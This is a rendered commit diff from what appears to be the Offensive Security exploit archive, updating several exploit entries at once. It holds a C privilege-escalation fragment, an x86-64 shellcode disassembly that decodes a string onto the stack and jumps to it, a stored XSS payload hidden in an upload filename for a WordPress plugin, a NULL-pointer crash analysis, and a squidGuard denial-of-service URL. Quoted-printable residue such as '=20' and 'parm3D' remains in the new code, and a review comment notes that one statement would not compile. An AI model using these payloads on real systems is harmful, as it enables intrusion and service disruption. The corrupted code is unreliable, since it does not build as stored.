DB: 2016-04-10

Offensive Security 2016-04-10 05:03:48 +00:00
parent 1f79ff2236
commit 830ff3bd6a
6 changed files with 640 additions and 639 deletions

1224
files.csv



@ -55,7 +55,7 @@ int main(int argc, char **argv)
exit(EXIT_FAILURE); exit(EXIT_FAILURE);
} }
} }
=09
snprintf(line, sizeof(line), "%c%s root %s %s\n",=20 snprintf(line, sizeof(line), "%c%s root %s %s\n",=20
6, argv[1], (mode)? "start":"stop", argv[1]); 6, argv[1], (mode)? "start":"stop", argv[1]);
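Review bot: The `=20` after the comma on the `snprintf(line, sizeof(line), "%c%s root %s %s\n",=20` line is printed in both columns, so as rendered the new file still carries a quoted-printable escape inside the C source and that statement would not compile as stored; only the `=09` line above it was cleaned. The same residue survives on the new side of the disassembly listing (`ff ff ff=20`, `f0 fa ff=20`, `d0 8c 97=20`, `c4 b7 46=20`), and the squidGuard request still ends in `parm3D0.58895697` with `parm` tokens split across wrapped lines, which looks like soft line breaks that were never rejoined. Decoding each affected file in a single quoted-printable pass would be more reliable than substituting individual escapes; for this line the result would end in `"%c%s root %s %s\n", ` with a plain trailing space. The body of main continues outside the hunk.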


@ -8,21 +8,21 @@ shell: file format elf64-x86-64
Disassembly of section .text: Disassembly of section .text:
0000000000400080 <start>: 0000000000400080 <start>:
400080:=0948 b9 ff ff ff ff ff =09movabs rcx,0xffffffffffffffff 400080: 48 b9 ff ff ff ff ff movabs rcx,0xffffffffffffffff
400087:=09ff ff ff=20 400087: ff ff ff=20
40008a:=0949 b8 ae b7 72 c3 db =09movabs r8,0xfffaf0dbc372b7ae 40008a: 49 b8 ae b7 72 c3 db movabs r8,0xfffaf0dbc372b7ae
400091:=09f0 fa ff=20 400091: f0 fa ff=20
400094:=0949 31 c8 =09xor r8,rcx 400094: 49 31 c8 xor r8,rcx
400097:=0941 50 =09push r8 400097: 41 50 push r8
400099:=0949 b8 d0 9d 96 91 d0 =09movabs r8,0x978cd0d091969dd0 400099: 49 b8 d0 9d 96 91 d0 movabs r8,0x978cd0d091969dd0
4000a0:=09d0 8c 97=20 4000a0: d0 8c 97=20
4000a3:=0949 31 c8 =09xor r8,rcx 4000a3: 49 31 c8 xor r8,rcx
4000a6:=0941 50 =09push r8 4000a6: 41 50 push r8
4000a8:=0949 b8 b7 ce 2d ad 4f =09movabs r8,0x46b7c44fad2dceb7 4000a8: 49 b8 b7 ce 2d ad 4f movabs r8,0x46b7c44fad2dceb7
4000af:=09c4 b7 46=20 4000af: c4 b7 46=20
4000b2:=0949 31 c8 =09xor r8,rcx 4000b2: 49 31 c8 xor r8,rcx
4000b5:=0941 50 =09push r8 4000b5: 41 50 push r8
4000b7:=09ff e4 =09jmp rsp 4000b7: ff e4 jmp rsp
2015 William Borskey 2015 William Borskey


@ -11,18 +11,19 @@
-- Description -- -- Description --
This stored XSS vulnerability allows any authenticated wordpress user The stored XSS vulnerability allows any authenticated user to inject malicious code via the name of the uploaded file:
to inject malicious code via the name of the uploaded file:
e.g. <svg onload=3D3Dalert(0)>.jpg
The vulnerability exists because the file name is not properly sanitized Example: <svg onload=alert(0)>.jpg
and this can lead to malicious code injection that will be executed on the
target=3DE2=3D80=3D99s browser The vulnerability exists because the file name is not properly sanitized
and this can lead to malicious code injection that will be executed on the
targets browser.
-- Proof of Concept -- -- Proof of Concept --
1. The attacker creates a new download package via the plugin's menu 1. The attacker creates a new download package via the plugin's menu
and uploads a file with the name: <svg onload=3D3Dalert(0)>.jpg and uploads a file with the name: <svg onload=alert(0)>.jpg
2. The stored XSS can be triggered when an authenticated user (e.g. admin) 2. The stored XSS can be triggered when an authenticated user (e.g. admin)
attempts to edit this download package attempts to edit this download package


@ -18,7 +18,7 @@ The "OpenEXEfile" function does not check if the return value of strchr() is zer
add edi, 4 add edi, 4
mov [esp+10h+var_C], 20h mov [esp+10h+var_C], 20h
mov [esp+10h+arg_24], eax mov [esp+10h+arg_24], eax
call strchr ; return EAX=3D 0 call strchr ; return EAX= 0
mov [esp+10h+var_10], eax mov [esp+10h+var_10], eax
mov [esp+10h+arg_28], eax ; (!) mov [esp+10h+arg_28], eax ; (!)
call strlen ; ntdll.strlen(s) call strlen ; ntdll.strlen(s)
@ -28,7 +28,7 @@ ntdll.strlen(s) - NULL parameter
--------------------------------------------------------------------- ---------------------------------------------------------------------
ntdll_strlen: ntdll_strlen:
mov ecx, [esp+4] ; [esp+4] =3D 0 NULL pointer mov ecx, [esp+4] ; [esp+4] = 0 NULL pointer
test ecx, 3 ; ... test ecx, 3 ; ...
jz short loc_77C77510 ; jump jz short loc_77C77510 ; jump
... ...


@ -7,8 +7,8 @@ A successful exploit will cause the application to enter emergency mode in which
squidGuard 1.4 is vulnerable; other versions may also be affected. squidGuard 1.4 is vulnerable; other versions may also be affected.
http://www.example.com/_playlist/playlist.xml?parm=0.25732559903520535?parm=0.8294737075929047?parm=0.24014121683296297?parm=0.9460915929498649?parm=0.3974535575371201?parm=0.797955814252201?parm=0.5941665450866088?parm=0.6912115486553755?parm=0.05073890069479603?parm=0.8963961504041598?parm=0.43654825009701137?parm=0.8214705010294044?parm=0.5274569610084057?parm=0.0007274525371858687?parm=0.14506218122553893?parm=0.49125362580323495?parm=0.6941617625067622?parm=0.7331781580530978?parm=0.6610984755864507?parm=0.8694141102186517?parm=0.1290539846224843?parm=0.45549314193532453?parm=0.860371532284247?parm=0.019043415282676057?parm=0.1470360022957906?parm=0.9782236742775064?parm=0.24810547207701195?parm=0.5038849472610185?parm=0.32986064536502857?parm=0.3443933666849265?parm=0.8665425396928025?parm=0.8360460125669642?parm=0.11572512117125244?pa http://www.example.com/_playlist/playlist.xml?parm=0.25732559903520535?parm=0.8294737075929047?parm=0.24014121683296297?parm=0.9460915929498649?parm=0.3974535575371201?parm=0.797955814252201?parm=0.5941665450866088?parm=0.6912115486553755?parm=0.05073890069479603?parm=0.8963961504041598?parm=0.43654825009701137?parm=0.8214705010294044?parm=0.5274569610084057?parm=0.0007274525371858687?parm=0.14506218122553893?parm=0.49125362580323495?parm=0.6941617625067622?parm=0.7331781580530978?parm=0.6610984755864507?parm=0.8694141102186517?parm=0.1290539846224843?parm=0.45549314193532453?parm=0.860371532284247?parm=0.019043415282676057?parm=0.1470360022957906?parm=0.9782236742775064?parm=0.24810547207701195?parm=0.5038849472610185?parm=0.32986064536502857?parm=0.3443933666849265?parm=0.8665425396928025?parm=0.8360460125669642?parm=0.11572512117125244?pa
rm=0.03510514000002962?parm=0.6746931283264278?parm=0.4470450325834908?parm=0.07785764204006762?parm=0.3401613372413357?parm=0.6885655479211563?parm=0.3378645245893567?parm=0.7530888030812639?parm=0.4385274529715908?parm=0.8546846734552437?parm=0.943562659437982?parm=0.2690958544139864?parm=0.9414778696948228?parm=0.9705285143976852?parm=0.03412914860633709?parm=0.5629524868314979?parm=0.26551896178241496?parm=0.9625820765908634?parm=0.6656541817421336?parm=0.6838127452100081?parm=0.2226939131764789?parm=0.48602838974004015?parm=0.2945117583623632?parm=0.529002994268698?parm=0.6426306330058106?parm=0.11966694941771472?parm=0.1721417044468887?parm=3D0.3754902481844036?parm=0.6737018509787533?parm=0.39546949087944683?parm=0.0491472806762866?parm=0.7376419322110352?parm=0.6499250853081242?parm=0.5242544168272583?parm=0.034808393547313354?parm rm=0.03510514000002962?parm=0.6746931283264278?parm=0.4470450325834908?parm=0.07785764204006762?parm=0.3401613372413357?parm=0.6885655479211563?parm=0.3378645245893567?parm=0.7530888030812639?parm=0.4385274529715908?parm=0.8546846734552437?parm=0.943562659437982?parm=0.2690958544139864?parm=0.9414778696948228?parm=0.9705285143976852?parm=0.03412914860633709?parm=0.5629524868314979?parm=0.26551896178241496?parm=0.9625820765908634?parm=0.6656541817421336?parm=0.6838127452100081?parm=0.2226939131764789?parm=0.48602838974004015?parm=0.2945117583623632?parm=0.529002994268698?parm=0.6426306330058106?parm=0.11966694941771472?parm=0.1721417044468887?parm=0.3754902481844036?parm=0.6737018509787533?parm=0.39546949087944683?parm=0.0491472806762866?parm=0.7376419322110352?parm=0.6499250853081242?parm=0.5242544168272583?parm=0.034808393547313354?parm
=0.4073861597524363?parm=0.05573713697624749?parm=0.9572804384429524?parm=0.1817429853821192?parm=0.014327680461904801?parm=0.17253608539764576?parm=0.8581309328485324?parm=0.9953321132994779?parm=0.08106975895631952?parm=0.4488913260181805?parm=0.1500808162508912?parm=0.6036570089972113?parm=0.3429374525213048?parm=0.5005802517999419?parm=0.051207514503536666?parm=0.766079189716261?parm=0.05149314425197127?parm=0.9171176947996869?parm=0.9128287890179406?parm=0.2472275256231583?parm=0.08768066601448787?parm=0.7282021350271008?parm=0.7364195421315026?parm=0.33803910476243226?parm=0.9731293024794875?parm=0.4665109365664606?parm=0.9599808584667793?parm=0.4666333564612767?parm=0.2870947294724183?parm=0.2525336676197266?parm=0.9769042933525486?parm=0.9091816595515594?parm=0.5717086294621162?parm=0.22264183558725903?parm=0.3786950609979425?par =0.4073861597524363?parm=0.05573713697624749?parm=0.9572804384429524?parm=0.1817429853821192?parm=0.014327680461904801?parm=0.17253608539764576?parm=0.8581309328485324?parm=0.9953321132994779?parm=0.08106975895631952?parm=0.4488913260181805?parm=0.1500808162508912?parm=0.6036570089972113?parm=0.3429374525213048?parm=0.5005802517999419?parm=0.051207514503536666?parm=0.766079189716261?parm=0.05149314425197127?parm=0.9171176947996869?parm=0.9128287890179406?parm=0.2472275256231583?parm=0.08768066601448787?parm=0.7282021350271008?parm=0.7364195421315026?parm=0.33803910476243226?parm=0.9731293024794875?parm=0.4665109365664606?parm=0.9599808584667793?parm=0.4666333564612767?parm=0.2870947294724183?parm=0.2525336676197266?parm=0.9769042933525486?parm=0.9091816595515594?parm=0.5717086294621162?parm=0.22264183558725903?parm=0.3786950609979425?par
m=0.5845679157357075?parm=0.5396548326610127?parm=0.9233495028064524?parm=0.0974877689966982?parm=0.7965176866365765?parm=0.2860844780143996?parm=0.0027286208156194203?parm=0.4651091074998567?parm=0.5730070981414728?parm=0.2505283628059568?parm=0.6441995109312953?parm=0.7025116726949593?parm=0.9451446634320427?parm=0.8747596688711037?parm=0.7084257035096256?parm=0.5067240755386497?parm=0.10635286404950961?parm=0.2590060181978189?parm=0.4757993339954312?parm=0.2120319757985698?parm=0.8975584037174784?parm=0.631604652076309?parm=0.2150116248909476?parm=0.46792574310758606?parm=0.4752334181586533?parm=0.11614011486437892?parm=0.5424607368502887?parm=3D0.49842045831432846?parm=0.3365122016115487?parm=0.10529902337628827?parm=0.6827568962602503?parm=0.7856740326146926?parm=0.09924147705627229?parm=0.5321218821234125?parm=0.29234258833331983?par m=0.5845679157357075?parm=0.5396548326610127?parm=0.9233495028064524?parm=0.0974877689966982?parm=0.7965176866365765?parm=0.2860844780143996?parm=0.0027286208156194203?parm=0.4651091074998567?parm=0.5730070981414728?parm=0.2505283628059568?parm=0.6441995109312953?parm=0.7025116726949593?parm=0.9451446634320427?parm=0.8747596688711037?parm=0.7084257035096256?parm=0.5067240755386497?parm=0.10635286404950961?parm=0.2590060181978189?parm=0.4757993339954312?parm=0.2120319757985698?parm=0.8975584037174784?parm=0.631604652076309?parm=0.2150116248909476?parm=0.46792574310758606?parm=0.4752334181586533?parm=0.11614011486437892?parm=0.5424607368502887?parm=0.49842045831432846?parm=0.3365122016115487?parm=0.10529902337628827?parm=0.6827568962602503?parm=0.7856740326146926?parm=0.09924147705627229?parm=0.5321218821234125?parm=0.29234258833331983?par
m=0.45540015833322023?parm=0.5647044038008046?parm=0.46702725451889426?parm=0.4662535800019342?parm=0.7323923339134595?parm=0.6268917225432019?parm=0.7629286375836214?parm=0.9123040395199864?parm=0.5815462771024456?parm=0.5345761196888793?parm=0.9209602153432136?parm=0.04748725664240383?parm=0.05308779345336989?parm=0.8610787797224873?parm=0.9557722872296609?parm=0.9481407994385496?parm=0.9102836584825768?parm=0.2914997397760458?parm=0.8020533987162777?parm=0.6684330848337933?parm=0.8337337199569539?parm=0.9983168241581639?parm=0.7228803317315997?parm=0.43098615737758783?parm=0.8684119503556965?parm=0.9436400538914193?parm=0.25569358266277475?parm3D0.58895697 m=0.45540015833322023?parm=0.5647044038008046?parm=0.46702725451889426?parm=0.4662535800019342?parm=0.7323923339134595?parm=0.6268917225432019?parm=0.7629286375836214?parm=0.9123040395199864?parm=0.5815462771024456?parm=0.5345761196888793?parm=0.9209602153432136?parm=0.04748725664240383?parm=0.05308779345336989?parm=0.8610787797224873?parm=0.9557722872296609?parm=0.9481407994385496?parm=0.9102836584825768?parm=0.2914997397760458?parm=0.8020533987162777?parm=0.6684330848337933?parm=0.8337337199569539?parm=0.9983168241581639?parm=0.7228803317315997?parm=0.43098615737758783?parm=0.8684119503556965?parm=0.9436400538914193?parm=0.25569358266277475?parm3D0.58895697